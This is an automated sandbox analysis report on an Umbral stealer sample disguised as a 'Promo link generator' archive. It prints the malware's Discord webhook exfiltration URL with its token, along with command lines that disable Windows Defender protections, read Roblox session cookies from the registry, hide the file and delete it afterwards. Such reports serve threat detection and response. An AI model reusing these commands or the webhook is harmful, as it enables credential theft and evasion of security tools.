umbral | hxxps://gofile[.]io/d/2qq6Da

Analysis

max time kernel
284s
max time network
274s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-03-2024 04:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/2qq6Da

Score

10^/10

umbral spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1196551286892535848/BI-4wJMe0VqcV998bhbMUu_wWa9MHqKDsvG2bhmZuynbA6FvVmQpf3BApw4_YqBZ6TZ5

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000800000002321b-106.dat	family_umbral
behavioral1/memory/640-108-0x000002C9C83F0000-0x000002C9C8430000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Promo link generator.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Promo link generator.exe

Executes dropped EXE 2 IoCs

pid	Process
640	Promo link generator.exe
5624	Promo link generator.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
88	discord.com
89	discord.com
105	discord.com
106	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
103	ip-api.com
85	ip-api.com

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5524	wmic.exe
216	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133539137019669401"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	chrome.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2564	PING.EXE
1804	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5416	vlc.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
2624	chrome.exe
2624	chrome.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
3272	powershell.exe
3272	powershell.exe
3272	powershell.exe
2172	powershell.exe
2172	powershell.exe
2172	powershell.exe
4224	powershell.exe
4224	powershell.exe
4224	powershell.exe
3568	powershell.exe
3568	powershell.exe
3568	powershell.exe
5772	powershell.exe
5772	powershell.exe
5772	powershell.exe
5944	powershell.exe
5944	powershell.exe
5944	powershell.exe
4284	powershell.exe
4284	powershell.exe
4284	powershell.exe
5168	powershell.exe
5168	powershell.exe
5168	powershell.exe
5012	powershell.exe
5012	powershell.exe
5012	powershell.exe
5492	chrome.exe
5492	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4872	7zFM.exe
5416	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeRestorePrivilege	4872	7zFM.exe
Token: 35	4872	7zFM.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeRestorePrivilege	3888	7zG.exe
Token: 35	3888	7zG.exe
Token: SeSecurityPrivilege	3888	7zG.exe
Token: SeSecurityPrivilege	3888	7zG.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe
Token: SeShutdownPrivilege	2624	chrome.exe
Token: SeCreatePagefilePrivilege	2624	chrome.exe

Suspicious use of FindShellTrayWindow 41 IoCs

pid	Process
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
4872	7zFM.exe
3888	7zG.exe
5308	7zG.exe
5416	vlc.exe
5416	vlc.exe
5416	vlc.exe
5416	vlc.exe
2624	chrome.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
2624	chrome.exe
5416	vlc.exe
5416	vlc.exe
5416	vlc.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5416	vlc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2624 wrote to memory of 4496	2624	chrome.exe	88
PID 2624 wrote to memory of 4496	2624	chrome.exe	88
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 3872	2624	chrome.exe	90
PID 2624 wrote to memory of 1216	2624	chrome.exe	91
PID 2624 wrote to memory of 1216	2624	chrome.exe	91
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92
PID 2624 wrote to memory of 3264	2624	chrome.exe	92

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3116	attrib.exe
5724	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/2qq6Da
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6f5d9758,0x7ffa6f5d9768,0x7ffa6f5d9778
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:2
  2⤵
  PID:3872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:8
  2⤵
  PID:1216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2192 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:8
  2⤵
  PID:3264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2908 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:1
  2⤵
  PID:1840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2924 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:1
  2⤵
  PID:3184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4612 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:1
  2⤵
  PID:1012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3096 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:8
  2⤵
  PID:2552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:8
  2⤵
  PID:848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5408 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:1
  2⤵
  PID:3916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3948 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:8
  2⤵
  PID:4636
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Amruus promo link generator.rar"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5464 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:1
  2⤵
  PID:960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:8
  2⤵
  PID:1100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5172 --field-trial-handle=1820,i,15228017968553854166,18154508031444199143,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5492

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2224

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4620

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap1662:116:7zEvent29766
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3888

C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe
"C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:640
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe"
  2⤵
  - Views/modifies file attributes
  PID:3116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4224
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:3984
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:1256
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3568
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:216
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe" && pause
  2⤵
  PID:1780
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:2564

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap21469:116:7zEvent6578
1⤵
- Suspicious use of FindShellTrayWindow
PID:5308

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\BlockMove.au"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5416

C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe
"C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:5624
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe"
  2⤵
  - Views/modifies file attributes
  PID:5724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5168
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:1380
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:4892
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5012
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5524
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Amruus promo link generator\Promo link generator.exe" && pause
  2⤵
  PID:5568
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:1804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
1cc9cc9665ea91c72fe34bdf30faf29c

SHA1
21786e8d5ba47a80f9b4bfd384017358fb195bc9

SHA256
d4f7df416ac90b70f3008ac3349a164b9292815065cecc54939c6a78a89ec2a1

SHA512
1d6786a94444a1df75ba0df04ffa3119a90b6cae05c45c59ac167eca8ba5a39f7087b23f590ab3dfc4127d6524d7138b2093e59cd80c95f4dffe55564a6f795c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Filesize
524B

MD5
2a4e79d93c8999aa39e150a8678dcfd3

SHA1
be26e6e54c860038efdaa5326a832dd02569cf2e

SHA256
bf5cba23dfd40129dcb053b6a6bed3a3edf162007c8f9c282e02c4e80a36dec6

SHA512
b7966a0ac608684920b71928f9ea1740ed2a9ab88974ff8400714b5e65e897fd93913b09e4a7d04780ed99811f7964c2ad789eff65f074918832498ba36915cb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Filesize
20KB

MD5
94aff4a98e454ff2019530adc211912b

SHA1
114f8ddf3c8a3a5c72edac7384dd4189f8b8c271

SHA256
32140684ffe2186cda81663fbb492e20fc8e9eeab72900c3c88b0e5678649421

SHA512
5a228f67cbf9bc358cae4cffba317fc1ed2fe7e22a4a66be4eadd00aed8429c5fb7cb4acbb07657c8c7d2bd082cc7f87c1bfaefdd9a49dcc188f8f0eb6441e75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
abe79a91bbfb47dea04d5bd0c271deae

SHA1
86a9a19a7dde633ad2960af78ed3f472ea90e114

SHA256
661e79c75d49053cee35e5a6af29ba55be7457c3d370ee9885349603142ab95f

SHA512
3c711106841796d08189f708812f1d98cbd598531eca009153c1537a3e9942bd534293cc7f3888d536eee6123240f2e60085601224d10ccc03acdf07669f4eac

Download Submit
